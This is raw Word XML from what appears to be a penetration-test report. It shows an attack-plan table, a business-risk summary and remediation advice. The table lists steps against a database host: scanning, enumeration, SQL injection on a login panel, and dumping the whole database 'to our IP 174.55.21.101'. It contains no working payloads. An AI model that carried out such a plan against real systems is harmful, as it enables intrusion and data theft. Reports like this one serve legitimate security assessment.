              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00647613" w:rsidRPr="00E075C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Get DB Admin Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="480C9ADD" w14:textId="4328066D" w:rsidR="00647613" w:rsidRDefault="00647613" w:rsidP="00647613">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E075C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.10.25.10</w:t>
            </w:r>
            <w:r w:rsidRPr="00E075C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>MSQL DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53E8B1B6" w14:textId="77777777" w:rsidR="00804A86" w:rsidRPr="00957FF4" w:rsidRDefault="00804A86" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Network Service Scanning and Port Enumeration.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F680BD" w14:textId="77777777" w:rsidR="00804A86" w:rsidRPr="00957FF4" w:rsidRDefault="00804A86" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subdomains and VHOST Enumeration.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB5A289" w14:textId="77777777" w:rsidR="00804A86" w:rsidRPr="00957FF4" w:rsidRDefault="00804A86" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application Enumeration by </w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  - Guessing File names, Endpoints, Login</w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     Portals, Hidden parameters </w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  - Identifying </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sensitive ,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Insecure &amp; Outdate Components</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72292D5F" w14:textId="43500230" w:rsidR="00804A86" w:rsidRPr="00957FF4" w:rsidRDefault="00C56831" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidR="00F500F4" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ind</w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, Exploit </w:t>
            </w:r>
            <w:r w:rsidR="00804A86" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Input Validation Failure</w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00F500F4" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) on Login Panel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30BE79EB" w14:textId="66A6E172" w:rsidR="00804A86" w:rsidRPr="00957FF4" w:rsidRDefault="00F500F4" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Dump All Database </w:t>
            </w:r>
            <w:r w:rsidR="009772A2" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to our IP 174.55.21.101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="030F816A" w14:textId="31F2BB6A" w:rsidR="00647613" w:rsidRDefault="00647613" w:rsidP="00647613">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC75DD" w14:paraId="5DF73C7C" w14:textId="77777777" w:rsidTr="00AC75DD">
        <w:trPr>
          <w:trHeight w:val="675"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6C7B99" w14:textId="6389EEA7" w:rsidR="00AC75DD" w:rsidRDefault="00AC75DD" w:rsidP="00825BFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647613">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Perform Internal Credential Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4903EC2E" w14:textId="3D9568CA" w:rsidR="00AC75DD" w:rsidRDefault="00AC75DD" w:rsidP="00AC75DD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.10.171.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BCE8CAB" w14:textId="35102FBB" w:rsidR="00AC75DD" w:rsidRDefault="00AC75DD" w:rsidP="00AC75DD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC75DD" w14:paraId="67919489" w14:textId="77777777" w:rsidTr="00AC75DD">
        <w:trPr>
          <w:trHeight w:val="675"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D83C02" w14:textId="77777777" w:rsidR="00AC75DD" w:rsidRDefault="00AC75DD" w:rsidP="00AC75DD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B123E0" w14:textId="77777777" w:rsidR="00AC75DD" w:rsidRDefault="00AC75DD" w:rsidP="00AC75DD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32830633" w14:textId="17E217A0" w:rsidR="00AC75DD" w:rsidRDefault="00AC75DD" w:rsidP="00AC75DD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A57FE08" w14:textId="77777777" w:rsidR="002552EC" w:rsidRDefault="002552EC" w:rsidP="002552EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14424382" w14:textId="77777777" w:rsidR="002552EC" w:rsidRDefault="002552EC" w:rsidP="002552EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FEE36A" w14:textId="77777777" w:rsidR="002552EC" w:rsidRDefault="002552EC" w:rsidP="002552EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5D2217" w14:textId="77777777" w:rsidR="00326D4D" w:rsidRPr="00326D4D" w:rsidRDefault="00326D4D" w:rsidP="00326D4D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B209F1" w14:textId="732104FA" w:rsidR="006B546A" w:rsidRPr="0073315A" w:rsidRDefault="0073315A" w:rsidP="0073315A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc178498957"/>
      <w:r w:rsidRPr="0073315A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="0073315A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Summary of Business Risks:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="43345DB3" w14:textId="77777777" w:rsidR="00D07CDA" w:rsidRPr="00D07CDA" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07CDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>High Severity Issues:</w:t>
      </w:r>
      <w:r w:rsidR="00D07CDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D07CDA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>High-severity vulnerabilities, such as XSS attacks, can lead to theft of user sessions or credentials, resulting in significant reputational and financial damage due to potential client data leakage</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CB731" w14:textId="2B9DBA8E" w:rsidR="006B546A" w:rsidRPr="00D07CDA" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07CDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Medium and Low Severity Issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECB3D6" w14:textId="4204A663" w:rsidR="006B546A" w:rsidRPr="00D07CDA" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07CDA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>These can lead to attacks on communication channels, resulting in sensitive data leakage or modification, affecting the integrity and confidentiality of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BBD4D7" w14:textId="6B69767D" w:rsidR="006B546A" w:rsidRPr="00D07CDA" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07CDA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information leakage about system components may be used for further malicious actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0E325" w14:textId="17CF0E64" w:rsidR="00253C3F" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07CDA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacks on outdated and unpatched system components can exploit publicly known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3866A512" w14:textId="77777777" w:rsidR="00253C3F" w:rsidRPr="00253C3F" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Enumeration of user emails/usernames and brute forcing their passwords could lead to unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D40004" w14:textId="36716CC5" w:rsidR="00195EAF" w:rsidRPr="00195EAF" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A combination of several issues can be used to achieve successful attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF445A7" w14:textId="77777777" w:rsidR="00195EAF" w:rsidRPr="00195EAF" w:rsidRDefault="00195EAF" w:rsidP="00195EAF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E3DE59" w14:textId="734F03B4" w:rsidR="00784033" w:rsidRPr="00784033" w:rsidRDefault="00784033" w:rsidP="00784033">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc178498958"/>
      <w:r w:rsidRPr="00784033">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Recommendations:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1AD5C04B" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00784033">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Application Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153ECD6C" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Modify code to implement parameterized queries and proper input validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B6959" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Perform input validation and output encoding on all user input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE54F41" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Secure framed content in a sandbox and disable all unused features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E34DF" w14:textId="6AD8D1A1" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Update the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>affecte</w:t>
      </w:r>
      <w:r w:rsidR="00A81E59">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> library to the latest supported version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF3B0E" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Disable global directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E98596" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Disable support for TLS version 1.0 and only support TLS 1.1 or higher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6D537" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Conduct a review of the current IT/Security program versus future requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171E4D10" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Establish Secure SDLC best practices and assign a Security Engineer to review code monthly, conduct Static and Dynamic Application Security Testing (SAST &amp; DAST).</w:t>
      </w:r>
    </w:p>
